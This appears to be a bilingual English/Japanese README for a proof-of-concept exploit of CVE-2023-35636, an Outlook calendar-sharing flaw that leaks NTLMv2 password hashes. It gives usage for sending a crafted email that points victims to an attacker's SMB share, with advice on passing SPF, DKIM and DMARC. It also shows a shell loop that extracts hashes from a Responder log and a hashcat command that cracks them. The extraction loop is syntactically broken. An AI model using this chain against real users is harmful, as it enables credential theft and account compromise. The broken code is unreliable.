Microsoft Outlook 情報漏洩脆弱性 (パスワードハッシュ漏洩) - Expect スクリプト PoC
CVE-2023-35636 は、Microsoft Outlook の予定表共有機能を悪用するもので、メールに 2 つのヘッダーを追加することで、Outlook がコンテンツを共有し、指定されたマシンに接続するように誘導し、NTLM v2 ハッシュを傍受する機会を作り出します。

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (すべての \ を忘れずに)

notes: chmod +x cve-2023-35636.sh
require app expect
require legitimate ip sender and email sender (to pass SPF, DKIM, DMARC) 注意: chmod +x cve-2023-35636.sh
アプリ expect が必要
正当な IP 送信元とメール送信元が必要 (SPF、DKIM、DMARC を通過するため)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
Kudos: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes クレジット: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
Workaround/Fix: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636 回避策/修正: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
more about me ;) https://www.linkedin.com/in/duy-huan-bui/ 詳細は私について ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal actions. The author is NOT responsible for any damage caused by the misuse of this script. ⚠️ 免責事項: 重要: このスクリプトは教育、倫理的なテスト、および合法的な使用のみを目的として提供されています。明示的な許可なくいかなるシステムやネットワークでも使用しないでください。コンピュータシステムやネットワークへの不正アクセスは違法であり、許可なく不正な活動を行ったユーザーは法的措置の対象となります。作者はこのスクリプトの誤用によって生じたいかなる損害についても責任を負いません。